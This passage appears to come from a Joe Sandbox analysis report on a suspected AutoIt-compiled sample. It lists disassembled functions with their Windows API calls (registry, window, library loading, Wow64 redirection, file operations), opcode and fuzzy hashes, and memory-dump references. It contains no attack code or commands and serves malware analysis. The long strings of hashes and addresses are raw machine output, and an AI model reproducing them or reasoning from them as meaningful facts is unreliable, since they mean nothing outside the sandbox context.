                                                                                                                        • API String ID: 3340791633-2594219639
                                                                                                                        • Opcode ID: 74731ac663ca00aec47cdf147cc1082140f03bd06720b5b4c25fdb16dda904ee
                                                                                                                        • Instruction ID: 25cbc3b5dc07b2c93bd2823fcccbc58678022017fe9f4e6f55f5a47f6e17b9a6
                                                                                                                        • Opcode Fuzzy Hash: 74731ac663ca00aec47cdf147cc1082140f03bd06720b5b4c25fdb16dda904ee
                                                                                                                        • Instruction Fuzzy Hash: 3331C134A55A08EFEF249E14CC45FEC3F65BB96390F984803FA11961E1E7B09940AB41
                                                                                                                        Function 0059C9EA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen
                                                                                                                        • String ID: HKEY_LOCAL_MACHINE$HKLM
                                                                                                                        • API String ID: 176396367-4004644295
                                                                                                                        • Opcode ID: 2cade854eb4908f9b374b67b62f35ba981a09a99db2bb01d5779fb6f223a36b7
                                                                                                                        • Instruction ID: 522803fa16ebc2750780e43fed22bc03c45084630453367975b6cd4281c06cd4
                                                                                                                        • Opcode Fuzzy Hash: 2cade854eb4908f9b374b67b62f35ba981a09a99db2bb01d5779fb6f223a36b7
                                                                                                                        • Instruction Fuzzy Hash: 0831F873A0056E4BCF30DF2C99501BE3F91BBA5790F55402AE855AB345F671CE84D7A0
                                                                                                                        Function 005A2F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 005A2F8D
                                                                                                                        • LoadLibraryW.KERNEL32(?), ref: 005A2F94
                                                                                                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 005A2FA9
                                                                                                                        • DestroyWindow.USER32(?), ref: 005A2FB1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                        • String ID: SysAnimate32
                                                                                                                        • API String ID: 3529120543-1011021900
                                                                                                                        • Opcode ID: 03ab5e489a4027317a90e1f0d6a2ae0bb6f6a0279b32785d7187ffa461151d4c
                                                                                                                        • Instruction ID: 96ab904e3b7256b38d47e8eba9819b34847afc57450e7fba80572e2985b0c4f6
                                                                                                                        • Opcode Fuzzy Hash: 03ab5e489a4027317a90e1f0d6a2ae0bb6f6a0279b32785d7187ffa461151d4c
                                                                                                                        • Instruction Fuzzy Hash: CF219A71204209AFEB108F68DC87EBF3BB9FB5A364F104619FA50D6190D771DC91AB60
                                                                                                                        Function 005A5660 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,00001060,?,00000004), ref: 005A56BB
                                                                                                                        • _wcslen.LIBCMT ref: 005A56CD
                                                                                                                        • _wcslen.LIBCMT ref: 005A56D8
                                                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 005A5816
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend_wcslen
                                                                                                                        • String ID: @U=u
                                                                                                                        • API String ID: 455545452-2594219639
                                                                                                                        • Opcode ID: e992f3e23b6a9c6ffbb7e171d4bece51ceea896cc28284fccf73fd481f471708
                                                                                                                        • Instruction ID: 4bcfde3f289dc3d914e2ea0f8c620b45377d4e0ceca0dd4ffae8d9c544bfb49c
                                                                                                                        • Opcode Fuzzy Hash: e992f3e23b6a9c6ffbb7e171d4bece51ceea896cc28284fccf73fd481f471708
                                                                                                                        • Instruction Fuzzy Hash: F611B1716006099ADF20DF658C85EEE7FACFF56760F104426F915DA081FB709A84CBA0
                                                                                                                        Function 0051600E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0051604C
                                                                                                                        • GetStockObject.GDI32(00000011), ref: 00516060
                                                                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 0051606A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateMessageObjectSendStockWindow
                                                                                                                        • String ID: @U=u
                                                                                                                        • API String ID: 3970641297-2594219639
                                                                                                                        • Opcode ID: 30323eebe2589afb3f6ad0efc8e340db9e3cd52195892856385bb894bc6ba083
                                                                                                                        • Instruction ID: b107be61bab182dbec4d44bf95da99212bad452a61abb8ec84958de889274cc6
                                                                                                                        • Opcode Fuzzy Hash: 30323eebe2589afb3f6ad0efc8e340db9e3cd52195892856385bb894bc6ba083
                                                                                                                        • Instruction Fuzzy Hash: A611AD72501508BFEF129FA48C48EEABFA9FF1D3A4F000206FA0556110C7329CA0EBA1
                                                                                                                        Function 00534D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00534D1E,005428E9,?,00534CBE,005428E9,005D88B8,0000000C,00534E15,005428E9,00000002), ref: 00534D8D
                                                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00534DA0
                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00534D1E,005428E9,?,00534CBE,005428E9,005D88B8,0000000C,00534E15,005428E9,00000002,00000000), ref: 00534DC3
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                        • Opcode ID: 974339bd7cf61aa76d78f159d82908e21f210110e3a7a5bedf94b514405cbfd3
                                                                                                                        • Instruction ID: 692752c2c850a5c8ed03e6f098b84b58c0440c771ae0dc7cf6b7e5924add74c1
                                                                                                                        • Opcode Fuzzy Hash: 974339bd7cf61aa76d78f159d82908e21f210110e3a7a5bedf94b514405cbfd3
                                                                                                                        • Instruction Fuzzy Hash: CDF03C34A40209ABDB119B94DC49BAEBFE5FB54751F0001A5E806A62A0CB70A944DE90
                                                                                                                        Function 00514E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00514EDD,?,005E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00514E9C
                                                                                                                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00514EAE
                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,00514EDD,?,005E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00514EC0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                        • API String ID: 145871493-3689287502
                                                                                                                        • Opcode ID: 5d36be5614eb4e6998002b964ab54e41cd091c887bffed96b6f490ff2449181c
                                                                                                                        • Instruction ID: 16283ffd9647496279248e6936e60fcdeb8308ace92cc0f5365f1196ffeef1e6
                                                                                                                        • Opcode Fuzzy Hash: 5d36be5614eb4e6998002b964ab54e41cd091c887bffed96b6f490ff2449181c
                                                                                                                        • Instruction Fuzzy Hash: 54E08635B016225BE33117257C18B9F7E58BF93B627050215FC04D2200DB60CD4598A2
                                                                                                                        Function 00514E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00553CDE,?,005E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00514E62
                                                                                                                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00514E74
                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,00553CDE,?,005E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00514E87
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                        • API String ID: 145871493-1355242751
                                                                                                                        • Opcode ID: 8b0b7506932a8cdee092e827fff0d333b0eeb814c379298c8e358e1370f63e03
                                                                                                                        • Instruction ID: c00cc8ec08d002cd9b4a5957fddf67c7e2e60ced3bcc97b4d2ec27bf5b7f19f1
                                                                                                                        • Opcode Fuzzy Hash: 8b0b7506932a8cdee092e827fff0d333b0eeb814c379298c8e358e1370f63e03
                                                                                                                        • Instruction Fuzzy Hash: 17D0123560262257A7321B257C18DCF7E1CBF87B513050715F905A6214DF61CD46D9E1
                                                                                                                        Function 0059A387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 0059A427
                                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0059A435
                                                                                                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0059A468
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0059A63D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3488606520-0
                                                                                                                        • Opcode ID: 70071c8f94f8d9fdefe7975291c013445fed951f668cd860608ae6e87da2c9fc
                                                                                                                        • Instruction ID: a1d191c2bac256b3c28d0f258f2a557af3329cf0ad95e8c8a8494c0d65edd18f
                                                                                                                        • Opcode Fuzzy Hash: 70071c8f94f8d9fdefe7975291c013445fed951f668cd860608ae6e87da2c9fc
                                                                                                                        • Instruction Fuzzy Hash: BCA160716043019FEB20DF24D88AB2ABBE5BF84714F14885DF55A9B3D2DB71EC418B92
                                                                                                                        Function 0054BB27 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,005B3700), ref: 0054BB91
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,005E121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0054BC09
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,005E1270,000000FF,?,0000003F,00000000,?), ref: 0054BC36
                                                                                                                        • _free.LIBCMT ref: 0054BB7F
                                                                                                                          • Part of subcall function 005429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0054D7D1,00000000,00000000,00000000,00000000,?,0054D7F8,00000000,00000007,00000000,?,0054DBF5,00000000), ref: 005429DE
                                                                                                                          • Part of subcall function 005429C8: GetLastError.KERNEL32(00000000,?,0054D7D1,00000000,00000000,00000000,00000000,?,0054D7F8,00000000,00000007,00000000,?,0054DBF5,00000000,00000000), ref: 005429F0
                                                                                                                        • _free.LIBCMT ref: 0054BD4B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1286116820-0
                                                                                                                        • Opcode ID: 017de7a3d97c3c82398593e4bc13c1b7bb4e02e70dfa46924d1dc0338f07028f
                                                                                                                        • Instruction ID: 6458ec65f0ef44d81316055b1b86e12903526851099121acaf2fa9c6b05f6472
                                                                                                                        • Opcode Fuzzy Hash: 017de7a3d97c3c82398593e4bc13c1b7bb4e02e70dfa46924d1dc0338f07028f
                                                                                                                        • Instruction Fuzzy Hash: D951E47190020AABEB14EF669CC59EEBFB8FB90318B10066AE554D7291EB30DE459B50
                                                                                                                        Function 0057E3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0057DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0057CF22,?), ref: 0057DDFD
                                                                                                                          • Part of subcall function 0057DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0057CF22,?), ref: 0057DE16
                                                                                                                          • Part of subcall function 0057E199: GetFileAttributesW.KERNEL32(?,0057CF95), ref: 0057E19A
                                                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 0057E473
                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 0057E4AC
                                                                                                                        • _wcslen.LIBCMT ref: 0057E5EB
                                                                                                                        • _wcslen.LIBCMT ref: 0057E603
                                                                                                                        • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0057E650
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3183298772-0
                                                                                                                        • Opcode ID: 1ca2ea8168c41e3a96d73ee7f9078b7d37f065beb2141432717f693e3f3fbaa5
                                                                                                                        • Instruction ID: f7b32ffa0406c7e72e17dbb538541a1960531860fa7a35bfe44debbd196d8cad
                                                                                                                        • Opcode Fuzzy Hash: 1ca2ea8168c41e3a96d73ee7f9078b7d37f065beb2141432717f693e3f3fbaa5
                                                                                                                        • Instruction Fuzzy Hash: 125192B24083455BC724DB90E8969DF7BECBFC8340F00492EF689D3151EF75A6889766
                                                                                                                        Function 0059B9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD
                                                                                                                          • Part of subcall function 0059C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0059B6AE,?,?), ref: 0059C9B5
                                                                                                                          • Part of subcall function 0059C998: _wcslen.LIBCMT ref: 0059C9F1
                                                                                                                          • Part of subcall function 0059C998: _wcslen.LIBCMT ref: 0059CA68
                                                                                                                          • Part of subcall function 0059C998: _wcslen.LIBCMT ref: 0059CA9E
                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0059BAA5
                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0059BB00
                                                                                                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0059BB63
                                                                                                                        • RegCloseKey.ADVAPI32(?,?), ref: 0059BBA6
                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0059BBB3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 826366716-0
                                                                                                                        • Opcode ID: ab358ccb64121e4d00b320407a521ea787e4b4bf072dc6102dfda4396054a205
                                                                                                                        • Instruction ID: cdc935dd82569dc0e844e059fad9d4eec726ddd56382caa8f3be6678c7951da6
                                                                                                                        • Opcode Fuzzy Hash: ab358ccb64121e4d00b320407a521ea787e4b4bf072dc6102dfda4396054a205
                                                                                                                        • Instruction Fuzzy Hash: 8661B031208241AFE714DF24C594E6ABFE5FF84308F14895CF49A8B2A2DB31ED45CB92
                                                                                                                        Function 00578BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00578BCD
                                                                                                                        • VariantClear.OLEAUT32 ref: 00578C3E
                                                                                                                        • VariantClear.OLEAUT32 ref: 00578C9D
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00578D10
                                                                                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00578D3B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Variant$Clear$ChangeInitType
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4136290138-0
                                                                                                                        • Opcode ID: 281ad127c6f5b488f41dd9095753c0cfa24943926c3d3f92b3153a99f55794ce
                                                                                                                        • Instruction ID: 7c80970e1213464221eb4496de8c75ebeb80294f245bfc2cd8b3f89fe0b275e7
                                                                                                                        • Opcode Fuzzy Hash: 281ad127c6f5b488f41dd9095753c0cfa24943926c3d3f92b3153a99f55794ce
                                                                                                                        • Instruction Fuzzy Hash: 415159B5A00219EFCB14CF68D894AAABBF8FF8D310B158559E909DB350E730E911CF90
                                                                                                                        Function 00588AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00588BAE
                                                                                                                        • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00588BDA
                                                                                                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00588C32
                                                                                                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00588C57
                                                                                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00588C5F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: PrivateProfile$SectionWrite$String
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2832842796-0
                                                                                                                        • Opcode ID: e2f24250b5eed848add13db3c6739fc7b70f9e648692a28f488ec06d04aa0c16
                                                                                                                        • Instruction ID: a19e350f6f286658c5e9b15f55307042e586999b4f5f3ad6ce430dbebeefcec4
                                                                                                                        • Opcode Fuzzy Hash: e2f24250b5eed848add13db3c6739fc7b70f9e648692a28f488ec06d04aa0c16
